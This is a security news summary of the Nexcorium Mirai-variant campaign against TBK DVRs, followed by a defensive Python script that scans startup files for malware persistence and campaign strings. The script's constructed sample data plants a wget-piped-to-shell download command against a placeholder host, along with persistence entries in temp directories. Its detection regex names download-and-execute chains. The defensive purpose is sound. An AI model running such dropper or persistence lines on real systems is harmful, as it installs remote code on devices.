Overview
- Fortinet’s FortiGuard Labs reports in-the-wild exploitation of CVE-2024-3721, a command-injection flaw in TBK DVR-4104 and DVR-4216 units, to install a Mirai-family strain dubbed Nexcorium.
- The intrusion drops a downloader that fetches architecture-specific Linux payloads (one build per CPU family) and prints a takeover message reading “nexuscorp has taken control”; the bot’s requests carry an “X-Hacked-By: Nexus Team” header.
- Once on a device, the malware tries Telnet logins with a large hard-coded username and password list and runs an embedded Huawei HG532 exploit (CVE-2017-17215) to spread inside local networks.
- The bot persists by adding cron jobs, a systemd service, rc.local entries, and inittab changes, then deletes its original binary from disk as it readies the device to take DDoS commands over UDP, TCP, and SMTP.
- Separately, Palo Alto Networks Unit 42 observed automated scans for CVE-2023-33538 against end-of-life TP-Link routers; the attempts were malformed and failed, but researchers still advise replacing unsupported models and removing default logins. CISA flagged the same flaw in June 2025.
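An added example, not code from the article or from FortiGuard Labs, of how a responder might triage the two things the write-up gives a defender to look for: the persistence locations listed above (cron, systemd, rc.local, inittab) and the two campaign strings. It takes the text of those startup files as captured from a suspect device (a constructed sample is embedded below) and flags entries that execute from temp or device directories or that chain a download into a shell. The directory list, the regex, the file contents and the capture excerpt are all assumptions; the only campaign-specific data is the header and message quoted in the article.

```python
"""Offline triage of startup entries and campaign strings (added example)."""
import re
from typing import Dict, Iterator, List, Tuple

# Heuristic (assumption): startup entries pointing into these directories are
# unusual for legitimate DVR firmware and typical of dropped payloads.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/dev/", "/var/run/")

# Download-then-execute idiom: a fetch tool followed by sh/chmod/./ after ; && or |
DROPPER_RE = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;|&\n]*(?:;|&&|\|\|?)\s*(?:sh\b|chmod\b|\./)"
)

# Strings quoted in the article for this campaign.
IOC_STRINGS = ("X-Hacked-By: Nexus Team", "nexuscorp has taken control")

Finding = Tuple[str, str, str]  # (file, reason, offending command)


def _commands(path: str, text: str) -> Iterator[str]:
    """Yield the executable part of every active entry, parsed per file type."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if path.endswith("inittab"):                      # id:levels:action:process
            parts = line.split(":", 3)
            if len(parts) == 4 and parts[3]:
                yield parts[3]
        elif path.endswith(".service"):                  # systemd unit file
            if line.startswith(("ExecStart=", "ExecStartPre=", "ExecStartPost=")):
                yield line.split("=", 1)[1].lstrip("-@+! ")
        elif "cron" in path:                              # crontab / cron.d
            if line.startswith("@"):                      # @reboot <cmd>
                parts = line.split(None, 1)
                if len(parts) == 2:
                    yield parts[1]
            else:                                         # m h dom mon dow [user] <cmd>
                parts = line.split(None, 5)
                if len(parts) == 6:
                    yield parts[5]
        elif line != "exit 0":                            # rc.local and similar scripts
            yield line


def audit_startup(files: Dict[str, str]) -> List[Finding]:
    """Return one finding per (entry, heuristic) pair that matches."""
    findings: List[Finding] = []
    for path, text in files.items():
        for cmd in _commands(path, text):
            if any(d in cmd for d in SUSPICIOUS_DIRS):
                findings.append((path, "runs from temp/device directory", cmd))
            if DROPPER_RE.search(cmd):
                findings.append((path, "download-and-execute chain", cmd))
    return findings


def find_iocs(blob: str) -> List[str]:
    """Return the campaign strings present in captured traffic or console text."""
    return [s for s in IOC_STRINGS if s in blob]


# Constructed sample host state (assumption): three benign entries, four planted ones.
SAMPLE_FILES = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts /etc/cron.hourly\n"
        "@reboot /tmp/.x/dvrhelper\n"
    ),
    "/etc/systemd/system/dvrhelper.service": (
        "[Service]\n"
        "ExecStart=/bin/sh -c 'wget http://192.0.2.10/dl.sh -O- | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/rc.local": "#!/bin/sh\n/usr/sbin/ntpd -p pool.ntp.org\n/dev/shm/.x/dvrhelper &\nexit 0\n",
    "/etc/inittab": (
        "id:3:initdefault:\n"
        "si::sysinit:/etc/init.d/rcS\n"
        "x1:2345:respawn:/var/run/.x/dvrhelper\n"
    ),
}

# Constructed capture excerpt (assumption), not real traffic.
SAMPLE_CAPTURE = (
    "GET /device.rsp HTTP/1.1\r\nHost: 192.0.2.20\r\n"
    "X-Hacked-By: Nexus Team\r\n\r\n"
)

if __name__ == "__main__":
    for f in audit_startup(SAMPLE_FILES):
        print("%-40s %-32s %s" % f)
    print("IOCs:", find_iocs(SAMPLE_CAPTURE))
```

On a real device, feed it the actual contents of /etc/crontab, /etc/cron.d/*, /var/spool/cron/*, /etc/systemd/system/*.service, /etc/rc.local and /etc/inittab; treat every hit as a lead to confirm by hand, since some embedded firmware legitimately launches helpers from /dev or /var/run.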